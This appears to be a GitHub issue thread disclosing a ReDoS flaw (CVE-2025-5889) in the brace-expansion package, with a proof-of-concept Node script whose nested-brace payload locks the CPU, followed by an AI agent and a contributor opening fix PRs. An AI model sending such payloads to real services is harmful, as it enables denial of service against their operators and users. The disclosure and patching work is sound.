brace-expansion Regular Expression Denial of Service vulnerability

[i5d6]

Summary:
ReDoS Vulnerability in brace-expansion (CVE-2025-5889)

Description:
A Regular Expression Denial of Service (ReDoS) vulnerability was identified in the brace-expansion package. The affected version 2.0.1 is currently present in the project (package-lock.json). An attacker can craft malicious inputs that cause excessive CPU consumption when processed by the library, leading to a Denial of Service (DoS) condition.

Steps To Reproduce

1. Install the vulnerable version:

npm install brace-expansion@2.0.1

2. Save the following code as poc.js:

const expand = require("brace-expansion");

function runReDoS(payload, label) {
  console.log(`\n[+] Testing: ${label}`);
  const start = Date.now();
  try {
    expand(payload);
  } catch (err) {
    console.error("Error:", err.message);
  }
  console.log(`Execution time: ${Date.now() - start} ms`);
}

console.log("Using brace-expansion version:", require("brace-expansion/package.json").version);

// Malicious nested payload
const evilMonster = "{a,".repeat(2000) + "b" + "}".repeat(2000);
runReDoS(evilMonster, "Evil Monster (2000 nested)");

3. Execute:

node poc.js

4. Result on version 2.0.1:

Using brace-expansion version: 2.0.1
[+] Testing: Evil Monster (2000 nested)
Execution time: 207 ms

Increasing the nesting to 5000 or more results in seconds of CPU lock, demonstrating the DoS potential.

Optional: Your Environment (Browser version, Device, etc)

• Not specified

Optional: Supporting Material/References (Screenshots)

• Impact: Attackers can exploit this flaw by sending malicious inputs (e.g., {a,{a,{a,...}}}), causing significant CPU consumption. This can lead to application slowdown, request queuing, or complete denial of service in production environments where user input is processed by brace-expansion (directly or indirectly via dependencies like minimatch, npm, or others).

https://github.com/modelcontextprotocol/servers/blob/main/package-lock.json#L6452
https://github.com/modelcontextprotocol/servers/blob/main/package-lock.json#L2616
https://github.com/modelcontextprotocol/servers/blob/main/package-lock.json#L6383

[olaservo]

@claude could you create a PR to update this package?

[claude]

Claude finished @olaservo's task —— View job • claude/issue-2700-20250914-2259 • Create PR ➔

---

✅ Successfully created PR to fix brace-expansion ReDoS vulnerability

Tasks:

• Read repository setup instructions
• Analyze current brace-expansion usage in package-lock.json
• Check for direct dependencies in package.json
• Update the vulnerable package
• Run tests and linting
• Commit and push changes
• Provide PR creation link

Summary:

• Fixed: brace-expansion ReDoS vulnerability (CVE-2025-5889)
• Method: Used npm audit fix to automatically update from v2.0.1 to a secure version
• Impact: Vulnerability found in 2 locations, now resolved (0 vulnerabilities remaining)
• Testing: All builds successful, 127 tests passed

Technical Details

Vulnerability Analysis:

• Found vulnerable brace-expansion v2.0.1 at multiple locations in package-lock.json
• This was a transitive dependency coming through minimatch and glob packages
• The filesystem server uses minimatch v10.0.1 and glob v10.3.10 which both depended on the vulnerable version

Fix Applied:

• Ran npm audit fix which automatically updated the package-lock.json
• Updated 6 lines in package-lock.json to use secure versions
• All tests continue to pass (127/127 tests passed)
• Build successful across all workspace packages

Verification:

• npm audit now shows 0 vulnerabilities
• All existing functionality preserved
• No breaking changes detected

[a77w3]

@claude good

[a77w3]

@olaservo's task

[tenequm]

I've submitted PR #2752 to fix this vulnerability.

The fix updates brace-expansion from 2.0.1 to 2.0.2, which resolves the ReDoS vulnerability (CVE-2025-5889). All tests pass and no code changes were required.

[i5d6]

@olaservo @tenequm @jchris

Did I do something wrong??

[tenequm]

@i5d6 what do you mean?